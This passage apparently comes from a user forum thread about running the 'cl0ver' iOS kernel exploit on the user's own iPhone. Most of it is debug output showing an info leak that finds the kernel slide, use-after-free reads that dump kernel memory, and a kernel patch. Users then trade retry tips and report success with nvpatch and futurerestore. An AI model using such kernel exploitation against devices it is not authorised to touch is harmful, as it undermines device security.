] Mem: 0xffffff8011edc000-0xffffff8011f82d8a File: 0x0000000001a6c000-0x0000000001b12d8a __PRELINK_INFO.__info [src/lib/uaf_read.c:500 uaf_dump_kernel]
[] Mem: 0xffffff80109c0000-0xffffff8010a19280 File: 0x0000000000550000-0x00000000005a9280 __LINKEDIT (skipped) [src/lib/uaf_read.c:496 uaf_dump_kernel]
[
] Kernel file size: 0x1a6c000 [src/lib/uaf_read.c:508 uaf_dump_kernel]
[] Dumping __TEXT... [src/lib/uaf_read.c:528 uaf_dump_kernel]
[
] Dumping kernel bytes 0xffffff8010406000-0xffffff80108f4000... [src/lib/uaf_read.c:288 uaf_read]
[*] Dumping 0xffffff8010406000-0xffffff801040e000... [src/lib/uaf_read.c:334 uaf_read]

This time the dumping went a little farther:

amouriPhone:/private/var/root root# ./cl0ver dump
[] Checking for config file... [src/lib/offsets.c:172 off_cfg]
[
] Yes, attempting to read anchor and vtab from config file... [src/lib/offsets.c:182 off_cfg]
[] Anchor: 0xffffff800454a000, Vtab (unslid): 0xffffff8004503168 [src/lib/offsets.c:186 off_cfg]
[
] Using info leak to get kernel slide... [src/lib/slide.c:64 get_kernel_slide]
[] Dict: [src/lib/slide.c:33 get_kernel_anchor]
[
] dict[0]: 0x000000d3 [src/lib/slide.c:33 get_kernel_anchor]
[] dict[1]: 0x81000002 [src/lib/slide.c:33 get_kernel_anchor]
[
] dict[2]: 0x08000004 [src/lib/slide.c:33 get_kernel_anchor]
[] dict[3]: 0x006c6f6c [src/lib/slide.c:33 get_kernel_anchor]
[
] dict[4]: 0x84000400 [src/lib/slide.c:33 get_kernel_anchor]
[] dict[5]: 0x69696969 [src/lib/slide.c:33 get_kernel_anchor]
[
] dict[6]: 0x69696969 [src/lib/slide.c:33 get_kernel_anchor]
[] Spawning user client / Parsing dictionary... [src/lib/io.c:59 _io_spawn_client]
[
] Getting IO service handle... [src/lib/io.c:45 _io_get_service]
[] Getting IO master port... [src/lib/io.c:30 get_io_master_port]
[
] Creating dict iterator... [src/lib/io.c:72 _io_iterator]
[] Getting next element from iterator... [src/lib/io.c:84 _io_next]
[
] Releasing user client... [src/lib/io.c:131 _io_release_client]
[] Kernel stack: [src/lib/slide.c:44 get_kernel_anchor]
[
] buf[ 0]: 0x6969696969696969 [src/lib/slide.c:44 get_kernel_anchor]
[] buf[ 1]: 0xffffff8009f4a000 [src/lib/slide.c:44 get_kernel_anchor]
[
] buf[ 2]: 0x00000000ff002bf1 [src/lib/slide.c:44 get_kernel_anchor]
[] buf[ 3]: 0xffffff810f24d5cc [src/lib/slide.c:44 get_kernel_anchor]
[
] buf[ 4]: 0xffffff810d7247b4 [src/lib/slide.c:44 get_kernel_anchor]
[] buf[ 5]: 0xffffff810f72cd00 [src/lib/slide.c:44 get_kernel_anchor]
[
] buf[ 6]: 0xffffff810f24d5a0 [src/lib/slide.c:44 get_kernel_anchor]
[] buf[ 7]: 0xffffff800946b950 [src/lib/slide.c:44 get_kernel_anchor]
[
] buf[ 8]: 0xffffff8009ad4edc [src/lib/slide.c:44 get_kernel_anchor]
[] buf[ 9]: 0x0000000000000000 [src/lib/slide.c:44 get_kernel_anchor]
[
] buf[10]: 0xffffff8009f50a50 [src/lib/slide.c:44 get_kernel_anchor]
[] buf[11]: 0xffffff810f24d000 [src/lib/slide.c:44 get_kernel_anchor]
[
] buf[12]: 0xffffff8009f9ecc8 [src/lib/slide.c:44 get_kernel_anchor]
[] buf[13]: 0x0000000000001074 [src/lib/slide.c:44 get_kernel_anchor]
[
] buf[14]: 0x0000000000000000 [src/lib/slide.c:44 get_kernel_anchor]
[] buf[15]: 0xffffff8009f9e050 [src/lib/slide.c:44 get_kernel_anchor]
[
] Kernel slide: 0x0000000005a00000 [src/lib/slide.c:67 get_kernel_slide]
[] OS build: 13A344 [src/lib/device.c:102 get_os_version_internal]
[
] Dumping kernel to file [src/lib/exploit.c:40 dump_kernel]
[] Dumping kernel, this will take some time... [src/lib/uaf_read.c:442 uaf_dump_kernel]
[
] Dumping kernel bytes 0xffffff8009a04000-0xffffff8009a05000... [src/lib/uaf_read.c:288 uaf_read]
[] Dumping 0xffffff8009a04000-0xffffff8009a05000... [src/lib/uaf_read.c:334 uaf_read]
[
] Kernel segments: [src/lib/uaf_read.c:467 uaf_dump_kernel]
[] Mem: 0xffffff8009a04000-0xffffff8009ef4000 File: 0x0000000000000000-0x00000000004f0000 __TEXT [src/lib/uaf_read.c:496 uaf_dump_kernel]
[
] Mem: 0xffffff8009a07000-0xffffff8009e9152c File: 0x0000000000003000-0x000000000048d52c __TEXT.__text [src/lib/uaf_read.c:500 uaf_dump_kernel]
[] Mem: 0xffffff8009e91540-0xffffff8009eb74cc File: 0x000000000048d540-0x00000000004b34cc __TEXT.__const [src/lib/uaf_read.c:500 uaf_dump_kernel]
[
] Mem: 0xffffff8009eb74cc-0xffffff8009ef3da5 File: 0x00000000004b34cc-0x00000000004efda5 __TEXT.__cstring [src/lib/uaf_read.c:500 uaf_dump_kernel]
[] Mem: 0xffffff8009ef4000-0xffffff8009fb8000 File: 0x00000000004f0000-0x0000000000548000 __DATA [src/lib/uaf_read.c:496 uaf_dump_kernel]
[
] Mem: 0xffffff8009ef4000-0xffffff8009ef4208 File: 0x00000000004f0000-0x00000000004f0208 __DATA.__mod_init_func [src/lib/uaf_read.c:500 uaf_dump_kernel]
[] Mem: 0xffffff8009ef4208-0xffffff8009ef4408 File: 0x00000000004f0208-0x00000000004f0408 __DATA.__mod_term_func [src/lib/uaf_read.c:500 uaf_dump_kernel]
[
] Mem: 0xffffff8009ef8000-0xffffff8009f15f88 File: 0x00000000004f4000-0x0000000000511f88 __DATA.__const [src/lib/uaf_read.c:500 uaf_dump_kernel]
[] Mem: 0xffffff8009f18000-0xffffff8009f48018 File: 0x0000000000514000-0x0000000000544018 __DATA.__data [src/lib/uaf_read.c:500 uaf_dump_kernel]
[
] Mem: 0xffffff8009f48018-0xffffff8009f49e40 File: 0x0000000000544018-0x0000000000545e40 __DATA.__sysctl_set [src/lib/uaf_read.c:500 uaf_dump_kernel]
[] Mem: 0xffffff8009f49e40-0xffffff8009f49e40 File: 0x0000000000545e40-0x0000000000545e40 __DATA.__llvm_prf_cnts [src/lib/uaf_read.c:500 uaf_dump_kernel]
[
] Mem: 0xffffff8009f49e40-0xffffff8009f49e40 File: 0x0000000000545e40-0x0000000000545e40 __DATA.__llvm_prf_data [src/lib/uaf_read.c:500 uaf_dump_kernel]
[] Mem: 0xffffff8009f49e40-0xffffff8009f49e40 File: 0x0000000000545e40-0x0000000000545e40 __DATA.__llvm_prf_names__DATA [src/lib/uaf_read.c:500 uaf_dump_kernel]
[
] Mem: 0xffffff8009f4a000-0xffffff8009f4b100 File: 0x0000000000000000-0x0000000000001100 __DATA.__common [src/lib/uaf_read.c:500 uaf_dump_kernel]
[] Mem: 0xffffff8009f4c000-0xffffff8009fb4eb8 File: 0x0000000000000000-0x0000000000068eb8 __DATA.__bss [src/lib/uaf_read.c:500 uaf_dump_kernel]
[
] Mem: 0xffffff8009fb8000-0xffffff8009fbc000 File: 0x0000000000548000-0x000000000054c000 __KLD (skipped) [src/lib/uaf_read.c:496 uaf_dump_kernel]
[] Mem: 0xffffff8009fb8000-0xffffff8009fb9258 File: 0x0000000000548000-0x0000000000549258 __KLD.__text [src/lib/uaf_read.c:500 uaf_dump_kernel]
[
] Mem: 0xffffff8009fb9258-0xffffff8009fb9960 File: 0x0000000000549258-0x0000000000549960 __KLD.__cstring [src/lib/uaf_read.c:500 uaf_dump_kernel]
[] Mem: 0xffffff8009fb9960-0xffffff8009fb99c8 File: 0x0000000000549960-0x00000000005499c8 __KLD.__const [src/lib/uaf_read.c:500 uaf_dump_kernel]
[
] Mem: 0xffffff8009fb99c8-0xffffff8009fb99d0 File: 0x00000000005499c8-0x00000000005499d0 __KLD.__mod_init_func [src/lib/uaf_read.c:500 uaf_dump_kernel]
[] Mem: 0xffffff8009fb99d0-0xffffff8009fb99d8 File: 0x00000000005499d0-0x00000000005499d8 __KLD.__mod_term_func [src/lib/uaf_read.c:500 uaf_dump_kernel]
[
] Mem: 0xffffff8009fb99d8-0xffffff8009fb99d9 File: 0x0000000000000000-0x0000000000000001 __KLD.__bss [src/lib/uaf_read.c:500 uaf_dump_kernel]
[] Mem: 0xffffff8009fbc000-0xffffff8009fc0000 File: 0x000000000054c000-0x0000000000550000 __LAST (skipped) [src/lib/uaf_read.c:496 uaf_dump_kernel]
[
] Mem: 0xffffff8009fbc000-0xffffff8009fbc008 File: 0x000000000054c000-0x000000000054c008 __LAST.__mod_init_func [src/lib/uaf_read.c:500 uaf_dump_kernel]
[] Mem: 0xffffff8009fbc008-0xffffff8009fbc008 File: 0x0000000000000000-0x0000000000000000 __LAST.__last [src/lib/uaf_read.c:500 uaf_dump_kernel]
[
] Mem: 0xffffff800a01c000-0xffffff800b4dc000 File: 0x00000000005ac000-0x0000000001a6c000 __PRELINK_TEXT [src/lib/uaf_read.c:496 uaf_dump_kernel]
[] Mem: 0xffffff800a01c000-0xffffff800b4dc000 File: 0x00000000005ac000-0x0000000001a6c000 __PRELINK_TEXT.__text [src/lib/uaf_read.c:500 uaf_dump_kernel]
[
] Mem: 0xffffff8009fc0000-0xffffff8009fc0000 File: 0x0000000000550000-0x0000000000550000 __PRELINK_STATE (skipped) [src/lib/uaf_read.c:496 uaf_dump_kernel]
[] Mem: 0xffffff8009fc0000-0xffffff8009fc0000 File: 0x0000000000550000-0x0000000000550000 __PRELINK_STATE.__kernel [src/lib/uaf_read.c:500 uaf_dump_kernel]
[
] Mem: 0xffffff8009fc0000-0xffffff8009fc0000 File: 0x0000000000550000-0x0000000000550000 __PRELINK_STATE.__kexts [src/lib/uaf_read.c:500 uaf_dump_kernel]
[] Mem: 0xffffff800b4dc000-0xffffff800b584000 File: 0x0000000001a6c000-0x0000000001b12d8a __PRELINK_INFO (skipped) [src/lib/uaf_read.c:496 uaf_dump_kernel]
[
] Mem: 0xffffff800b4dc000-0xffffff800b582d8a File: 0x0000000001a6c000-0x0000000001b12d8a __PRELINK_INFO.__info [src/lib/uaf_read.c:500 uaf_dump_kernel]
[] Mem: 0xffffff8009fc0000-0xffffff800a019280 File: 0x0000000000550000-0x00000000005a9280 __LINKEDIT (skipped) [src/lib/uaf_read.c:496 uaf_dump_kernel]
[
] Kernel file size: 0x1a6c000 [src/lib/uaf_read.c:508 uaf_dump_kernel]
[] Dumping __TEXT... [src/lib/uaf_read.c:528 uaf_dump_kernel]
[
] Dumping kernel bytes 0xffffff8009a06000-0xffffff8009ef4000... [src/lib/uaf_read.c:288 uaf_read]
[] Dumping 0xffffff8009a06000-0xffffff8009a0e000... [src/lib/uaf_read.c:334 uaf_read]
[
] Dumping 0xffffff8009a0e000-0xffffff8009a16000... [src/lib/uaf_read.c:334 uaf_read]
[] Dumping 0xffffff8009a16000-0xffffff8009a1e000... [src/lib/uaf_read.c:334 uaf_read]
[
] Dumping 0xffffff8009a1e000-0xffffff8009a26000... [src/lib/uaf_read.c:334 uaf_read]
[] Dumping 0xffffff8009a26000-0xffffff8009a2e000... [src/lib/uaf_read.c:334 uaf_read]
[
] Dumping 0xffffff8009a2e000-0xffffff8009a36000... [src/lib/uaf_read.c:334 uaf_read]
[] Dumping 0xffffff8009a36000-0xffffff8009a3e000... [src/lib/uaf_read.c:334 uaf_read]
[
] Dumping 0xffffff8009a3e000-0xffffff8009a46000... [src/lib/uaf_read.c:334 uaf_read]
[] Dumping 0xffffff8009a46000-0xffffff8009a4e000... [src/lib/uaf_read.c:334 uaf_read]
[
] Dumping 0xffffff8009a4e000-0xffffff8009a56000... [src/lib/uaf_read.c:334 uaf_read]
[] Dumping 0xffffff8009a56000-0xffffff8009a5e000... [src/lib/uaf_read.c:334 uaf_read]
[
] Dumping 0xffffff8009a5e000-0xffffff8009a66000... [src/lib/uaf_read.c:334 uaf_read]
[] Dumping 0xffffff8009a66000-0xffffff8009a6e000... [src/lib/uaf_read.c:334 uaf_read]
[
] Dumping 0xffffff8009a6e000-0xffffff8009a76000... [src/lib/uaf_read.c:334 uaf_read]
[] Dumping 0xffffff8009a76000-0xffffff8009a7e000... [src/lib/uaf_read.c:334 uaf_read]
[
] Dumping 0xffffff8009a7e000-0xffffff8009a86000... [src/lib/uaf_read.c:334 uaf_read]
[] Dumping 0xffffff8009a86000-0xffffff8009a8e000... [src/lib/uaf_read.c:334 uaf_read]
[
] Dumping 0xffffff8009a8e000-0xffffff8009a96000... [src/lib/uaf_read.c:334 uaf_read]
[] Dumping 0xffffff8009a96000-0xffffff8009a9e000... [src/lib/uaf_read.c:334 uaf_read]
[
] Dumping 0xffffff8009a9e000-0xffffff8009aa6000... [src/lib/uaf_read.c:334 uaf_read]
[] Dumping 0xffffff8009aa6000-0xffffff8009aae000... [src/lib/uaf_read.c:334 uaf_read]
[
] Dumping 0xffffff8009aae000-0xffffff8009ab6000... [src/lib/uaf_read.c:334 uaf_read]
[] Dumping 0xffffff8009ab6000-0xffffff8009abe000... [src/lib/uaf_read.c:334 uaf_read]
[
] Dumping 0xffffff8009abe000-0xffffff8009ac6000... [src/lib/uaf_read.c:334 uaf_read]
[] Dumping 0xffffff8009ac6000-0xffffff8009ace000... [src/lib/uaf_read.c:334 uaf_read]
[
] Dumping 0xffffff8009ace000-0xffffff8009ad6000... [src/lib/uaf_read.c:334 uaf_read]
[] Dumping 0xffffff8009ad6000-0xffffff8009ade000... [src/lib/uaf_read.c:334 uaf_read]
[
] Dumping 0xffffff8009ade000-0xffffff8009ae6000... [src/lib/uaf_read.c:334 uaf_read]
[] Dumping 0xffffff8009ae6000-0xffffff8009aee000... [src/lib/uaf_read.c:334 uaf_read]
[
] Dumping 0xffffff8009aee000-0xffffff8009af6000... [src/lib/uaf_read.c:334 uaf_read]
[] Dumping 0xffffff8009af6000-0xffffff8009afe000... [src/lib/uaf_read.c:334 uaf_read]
[
] Dumping 0xffffff8009afe000-0xffffff8009b06000... [src/lib/uaf_read.c:334 uaf_read]
[] Dumping 0xffffff8009b06000-0xffffff8009b0e000... [src/lib/uaf_read.c:334 uaf_read]
[
] Dumping 0xffffff8009b0e000-0xffffff8009b16000... [src/lib/uaf_read.c:334 uaf_read]
[] Dumping 0xffffff8009b16000-0xffffff8009b1e000... [src/lib/uaf_read.c:334 uaf_read]
[
] Dumping 0xffffff8009b1e000-0xffffff8009b26000... [src/lib/uaf_read.c:334 uaf_read]
[] Dumping 0xffffff8009b26000-0xffffff8009b2e000... [src/lib/uaf_read.c:334 uaf_read]
[
] Dumping 0xffffff8009b2e000-0xffffff8009b36000... [src/lib/uaf_read.c:334 uaf_read]
[] Dumping 0xffffff8009b36000-0xffffff8009b3e000... [src/lib/uaf_read.c:334 uaf_read]
[
] Dumping 0xffffff8009b3e000-0xffffff8009b46000... [src/lib/uaf_read.c:334 uaf_read]
[] Dumping 0xffffff8009b46000-0xffffff8009b4e000... [src/lib/uaf_read.c:334 uaf_read]
[
] Dumping 0xffffff8009b4e000-0xffffff8009b56000... [src/lib/uaf_read.c:334 uaf_read]
[] Dumping 0xffffff8009b56000-0xffffff8009b5e000... [src/lib/uaf_read.c:334 uaf_read]
[
] Dumping 0xffffff8009b5e000-0xffffff8009b66000... [src/lib/uaf_read.c:334 uaf_read]
[] Dumping 0xffffff8009b66000-0xffffff8009b6e000... [src/lib/uaf_read.c:334 uaf_read]
[
] Dumping 0xffffff8009b6e000-0xffffff8009b76000... [src/lib/uaf_read.c:334 uaf_read]
[] Dumping 0xffffff8009b76000-0xffffff8009b7e000... [src/lib/uaf_read.c:334 uaf_read]
[
] Dumping 0xffffff8009b7e000-0xffffff8009b86000... [src/lib/uaf_read.c:334 uaf_read]
[] Dumping 0xffffff8009b86000-0xffffff8009b8e000... [src/lib/uaf_read.c:334 uaf_read]
[
] Dumping 0xffffff8009b8e000-0xffffff8009b96000... [src/lib/uaf_read.c:334 uaf_read]
[] Dumping 0xffffff8009b96000-0xffffff8009b9e000... [src/lib/uaf_read.c:334 uaf_read]
[
] Dumping 0xffffff8009b9e000-0xffffff8009ba6000... [src/lib/uaf_read.c:334 uaf_read]

Hey, just saw your post. Maybe you wanna try, what helped me further back with my ipad. (see here)
I also had the right config but just the dumping crashed instantly, sometimes it went a little more, as you describe it. Tried like 50 times. And when it actually worked, it was with iTunes involved.

Well, coincidentally and without even following your steps, dumping worked! xD

Now I finally have the kernel! 💃

And finally!
[*] Successfully installed patch [src/lib/exploit.c:168 patch_host_special_port_4]

I can't thank you enough! 👍 Successfully nvpatch-ed and futurerestore-ed ❤️